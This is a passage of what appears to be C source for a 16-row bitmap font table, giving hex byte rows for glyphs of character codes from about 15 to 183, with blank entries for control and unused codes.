0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 15 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 16 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 17 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 18 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 19 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 20 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 21 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 22 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 23 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 24 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 25 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 26 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 27 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 28 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 29 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 30 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 31 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 32 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 33 */ 0x00, 0x00, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x00, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 34 */ 0x00, 0x00, 0x6c, 0x6c, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 35 */ 0x00, 0x00, 0x00, 0x36, 0x36, 0x7f, 0x36, 0x36, 0x7f, 0x36, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, /* 36 */ 0x00, 0x08, 0x08, 0x3e, 0x6b, 0x0b, 0x0b, 0x3e, 0x68, 0x68, 0x6b, 0x3e, 0x08, 0x08, 0x00, 0x00, /* 37 */ 0x00, 0x00, 0x00, 0x33, 0x13, 0x18, 0x08, 0x0c, 0x04, 0x06, 0x32, 0x33, 0x00, 0x00, 0x00, 0x00, /* 38 */ 0x00, 0x00, 0x1c, 0x36, 0x36, 0x1c, 0x6c, 0x3e, 0x33, 0x33, 0x7b, 0xce, 0x00, 0x00, 0x00, 0x00, /* 39 */ 0x00, 0x00, 0x18, 0x18, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 40 */ 0x00, 0x00, 0x30, 0x18, 0x18, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x18, 0x18, 0x30, 0x00, 0x00, 0x00, /* 41 */ 0x00, 0x00, 0x0c, 0x18, 0x18, 0x30, 0x30, 0x30, 0x30, 0x30, 0x18, 0x18, 0x0c, 0x00, 0x00, 0x00, /* 42 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x1c, 0x7f, 0x1c, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 43 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x7e, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 44 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x0c, 0x00, 0x00, 0x00, /* 45 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 46 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 47 */ 0x00, 0x00, 0x60, 0x20, 0x30, 0x10, 0x18, 0x08, 0x0c, 0x04, 0x06, 0x02, 0x03, 0x00, 0x00, 0x00, /* 48 */ 0x00, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x6b, 0x6b, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 49 */ 0x00, 0x00, 0x18, 0x1e, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 50 */ 0x00, 0x00, 0x3e, 0x63, 0x60, 0x60, 0x30, 0x18, 0x0c, 0x06, 0x03, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 51 */ 0x00, 0x00, 0x3e, 0x63, 0x60, 0x60, 0x3c, 0x60, 0x60, 0x60, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 52 */ 0x00, 0x00, 0x30, 0x38, 0x3c, 0x36, 0x33, 0x7f, 0x30, 0x30, 0x30, 0x30, 0x00, 0x00, 0x00, 0x00, /* 53 */ 0x00, 0x00, 0x7f, 0x03, 0x03, 0x3f, 0x60, 0x60, 0x60, 0x60, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 54 */ 0x00, 0x00, 0x3c, 0x06, 0x03, 0x03, 0x3f, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 55 */ 0x00, 0x00, 0x7f, 0x60, 0x30, 0x30, 0x18, 0x18, 0x18, 0x0c, 0x0c, 0x0c, 0x00, 0x00, 0x00, 0x00, /* 56 */ 0x00, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 57 */ 0x00, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x7e, 0x60, 0x60, 0x60, 0x30, 0x1e, 0x00, 0x00, 0x00, 0x00, /* 58 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 59 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x00, 0x18, 0x18, 0x0c, 0x00, 0x00, 0x00, /* 60 */ 0x00, 0x00, 0x60, 0x30, 0x18, 0x0c, 0x06, 0x06, 0x0c, 0x18, 0x30, 0x60, 0x00, 0x00, 0x00, 0x00, /* 61 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x7e, 0x00, 0x00, 0x7e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 62 */ 0x00, 0x00, 0x06, 0x0c, 0x18, 0x30, 0x60, 0x60, 0x30, 0x18, 0x0c, 0x06, 0x00, 0x00, 0x00, 0x00, /* 63 */ 0x00, 0x00, 0x3e, 0x63, 0x60, 0x30, 0x30, 0x18, 0x18, 0x00, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 64 */ 0x00, 0x00, 0x3c, 0x66, 0x73, 0x7b, 0x6b, 0x6b, 0x7b, 0x33, 0x06, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 65 */ 0x00, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x7f, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 66 */ 0x00, 0x00, 0x3f, 0x63, 0x63, 0x63, 0x3f, 0x63, 0x63, 0x63, 0x63, 0x3f, 0x00, 0x00, 0x00, 0x00, /* 67 */ 0x00, 0x00, 0x3c, 0x66, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x66, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 68 */ 0x00, 0x00, 0x1f, 0x33, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x33, 0x1f, 0x00, 0x00, 0x00, 0x00, /* 69 */ 0x00, 0x00, 0x7f, 0x03, 0x03, 0x03, 0x3f, 0x03, 0x03, 0x03, 0x03, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 70 */ 0x00, 0x00, 0x7f, 0x03, 0x03, 0x03, 0x3f, 0x03, 0x03, 0x03, 0x03, 0x03, 0x00, 0x00, 0x00, 0x00, /* 71 */ 0x00, 0x00, 0x3c, 0x66, 0x03, 0x03, 0x03, 0x73, 0x63, 0x63, 0x66, 0x7c, 0x00, 0x00, 0x00, 0x00, /* 72 */ 0x00, 0x00, 0x63, 0x63, 0x63, 0x63, 0x7f, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 73 */ 0x00, 0x00, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 74 */ 0x00, 0x00, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x33, 0x1e, 0x00, 0x00, 0x00, 0x00, /* 75 */ 0x00, 0x00, 0x63, 0x33, 0x1b, 0x0f, 0x07, 0x07, 0x0f, 0x1b, 0x33, 0x63, 0x00, 0x00, 0x00, 0x00, /* 76 */ 0x00, 0x00, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 77 */ 0x00, 0x00, 0x63, 0x63, 0x77, 0x7f, 0x7f, 0x6b, 0x6b, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 78 */ 0x00, 0x00, 0x63, 0x63, 0x67, 0x6f, 0x6f, 0x7b, 0x7b, 0x73, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 79 */ 0x00, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 80 */ 0x00, 0x00, 0x3f, 0x63, 0x63, 0x63, 0x63, 0x3f, 0x03, 0x03, 0x03, 0x03, 0x00, 0x00, 0x00, 0x00, /* 81 */ 0x00, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x6f, 0x7b, 0x3e, 0x30, 0x60, 0x00, 0x00, /* 82 */ 0x00, 0x00, 0x3f, 0x63, 0x63, 0x63, 0x63, 0x3f, 0x1b, 0x33, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 83 */ 0x00, 0x00, 0x3e, 0x63, 0x03, 0x03, 0x0e, 0x38, 0x60, 0x60, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 84 */ 0x00, 0x00, 0x7e, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 85 */ 0x00, 0x00, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 86 */ 0x00, 0x00, 0x63, 0x63, 0x63, 0x63, 0x63, 0x36, 0x36, 0x1c, 0x1c, 0x08, 0x00, 0x00, 0x00, 0x00, /* 87 */ 0x00, 0x00, 0x63, 0x63, 0x6b, 0x6b, 0x6b, 0x6b, 0x7f, 0x36, 0x36, 0x36, 0x00, 0x00, 0x00, 0x00, /* 88 */ 0x00, 0x00, 0x63, 0x63, 0x36, 0x36, 0x1c, 0x1c, 0x36, 0x36, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 89 */ 0x00, 0x00, 0xc3, 0xc3, 0x66, 0x66, 0x3c, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 90 */ 0x00, 0x00, 0x7f, 0x30, 0x30, 0x18, 0x18, 0x0c, 0x0c, 0x06, 0x06, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 91 */ 0x00, 0x00, 0x3c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 92 */ 0x00, 0x00, 0x03, 0x02, 0x06, 0x04, 0x0c, 0x08, 0x18, 0x10, 0x30, 0x20, 0x60, 0x00, 0x00, 0x00, /* 93 */ 0x00, 0x00, 0x3c, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 94 */ 0x00, 0x08, 0x1c, 0x36, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 95 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, /* 96 */ 0x00, 0x00, 0x0c, 0x0c, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 97 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x60, 0x7e, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 98 */ 0x00, 0x00, 0x03, 0x03, 0x03, 0x3b, 0x67, 0x63, 0x63, 0x63, 0x67, 0x3b, 0x00, 0x00, 0x00, 0x00, /* 99 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x63, 0x03, 0x03, 0x03, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 100 */ 0x00, 0x00, 0x60, 0x60, 0x60, 0x6e, 0x73, 0x63, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 101 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x63, 0x63, 0x7f, 0x03, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 102 */ 0x00, 0x00, 0x3c, 0x66, 0x06, 0x1f, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x00, 0x00, 0x00, 0x00, /* 103 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x6e, 0x73, 0x63, 0x63, 0x63, 0x73, 0x6e, 0x60, 0x63, 0x3e, 0x00, /* 104 */ 0x00, 0x00, 0x03, 0x03, 0x03, 0x3b, 0x67, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 105 */ 0x00, 0x00, 0x0c, 0x0c, 0x00, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x38, 0x00, 0x00, 0x00, 0x00, /* 106 */ 0x00, 0x00, 0x30, 0x30, 0x00, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x33, 0x1e, 0x00, /* 107 */ 0x00, 0x00, 0x03, 0x03, 0x03, 0x63, 0x33, 0x1b, 0x0f, 0x1f, 0x33, 0x63, 0x00, 0x00, 0x00, 0x00, /* 108 */ 0x00, 0x00, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x38, 0x00, 0x00, 0x00, 0x00, /* 109 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x35, 0x6b, 0x6b, 0x6b, 0x6b, 0x6b, 0x6b, 0x00, 0x00, 0x00, 0x00, /* 110 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3b, 0x67, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 111 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 112 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3b, 0x67, 0x63, 0x63, 0x63, 0x67, 0x3b, 0x03, 0x03, 0x03, 0x00, /* 113 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x6e, 0x73, 0x63, 0x63, 0x63, 0x73, 0x6e, 0x60, 0xe0, 0x60, 0x00, /* 114 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3b, 0x67, 0x03, 0x03, 0x03, 0x03, 0x03, 0x00, 0x00, 0x00, 0x00, /* 115 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x63, 0x0e, 0x38, 0x60, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 116 */ 0x00, 0x00, 0x00, 0x0c, 0x0c, 0x3e, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x38, 0x00, 0x00, 0x00, 0x00, /* 117 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 0x63, 0x63, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 118 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 0x63, 0x36, 0x36, 0x1c, 0x1c, 0x08, 0x00, 0x00, 0x00, 0x00, /* 119 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 0x6b, 0x6b, 0x6b, 0x3e, 0x36, 0x36, 0x00, 0x00, 0x00, 0x00, /* 120 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 0x36, 0x1c, 0x1c, 0x1c, 0x36, 0x63, 0x00, 0x00, 0x00, 0x00, /* 121 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 0x63, 0x36, 0x36, 0x1c, 0x1c, 0x0c, 0x0c, 0x06, 0x03, 0x00, /* 122 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x7f, 0x60, 0x30, 0x18, 0x0c, 0x06, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 123 */ 0x00, 0x00, 0x70, 0x18, 0x18, 0x18, 0x18, 0x0e, 0x18, 0x18, 0x18, 0x18, 0x70, 0x00, 0x00, 0x00, /* 124 */ 0x00, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x00, 0x00, 0x00, /* 125 */ 0x00, 0x00, 0x0e, 0x18, 0x18, 0x18, 0x18, 0x70, 0x18, 0x18, 0x18, 0x18, 0x0e, 0x00, 0x00, 0x00, /* 126 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6e, 0x3b, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 127 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 128 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 129 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 130 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 131 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 132 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 133 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 134 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 135 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 136 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 137 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 138 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 139 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 140 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 141 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 142 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 143 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 144 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 145 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 146 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 147 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 148 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 149 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 150 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 151 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 152 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 153 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 154 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 155 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 156 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 157 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 158 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 159 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 160 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 161 */ 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x00, 0x00, /* 162 */ 0x00, 0x00, 0x00, 0x08, 0x08, 0x3e, 0x6b, 0x0b, 0x0b, 0x0b, 0x6b, 0x3e, 0x08, 0x08, 0x00, 0x00, /* 163 */ 0x00, 0x00, 0x1c, 0x36, 0x06, 0x06, 0x1f, 0x06, 0x06, 0x07, 0x6f, 0x3b, 0x00, 0x00, 0x00, 0x00, /* 164 */ 0x00, 0x00, 0x00, 0x00, 0x66, 0x3c, 0x66, 0x66, 0x66, 0x3c, 0x66, 0x00, 0x00, 0x00, 0x00, 0x00, /* 165 */ 0x00, 0x00, 0xc3, 0xc3, 0x66, 0x66, 0x3c, 0x7e, 0x18, 0x7e, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 166 */ 0x00, 0x00, 0x18, 0x18, 0x18, 0x18, 0x00, 0x00, 0x18, 0x18, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 167 */ 0x00, 0x3c, 0x66, 0x0c, 0x1e, 0x33, 0x63, 0x66, 0x3c, 0x18, 0x33, 0x1e, 0x00, 0x00, 0x00, 0x00, /* 168 */ 0x00, 0x00, 0x36, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 169 */ 0x00, 0x00, 0x3c, 0x42, 0x99, 0xa5, 0x85, 0xa5, 0x99, 0x42, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x00, /* 170 */ 0x00, 0x1e, 0x30, 0x3e, 0x33, 0x3b, 0x36, 0x00, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 171 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x6c, 0x36, 0x1b, 0x1b, 0x36, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x00, /* 172 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7f, 0x60, 0x60, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 173 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 174 */ 0x00, 0x00, 0x3c, 0x42, 0x9d, 0xa5, 0x9d, 0xa5, 0xa5, 0x42, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x00, /* 175 */ 0x00, 0x7e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 176 */ 0x00, 0x00, 0x1c, 0x36, 0x36, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 177 */ 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x7e, 0x18, 0x18, 0x00, 0x7e, 0x00, 0x00, 0x00, 0x00, 0x00, /* 178 */ 0x00, 0x1e, 0x33, 0x18, 0x0c, 0x06, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 179 */ 0x00, 0x1e, 0x33, 0x18, 0x30, 0x33, 0x1e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 180 */ 0x00, 0x30, 0x18, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 181 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x76, 0x6e, 0x06, 0x06, 0x03, 0x00, /* 182 */ 0x00, 0x00, 0x7e, 0x2f, 0x2f, 0x2f, 0x2e, 0x28, 0x28, 0x28, 0x28, 0x28, 0x00, 0x00, 0x00, 0x00, /* 183 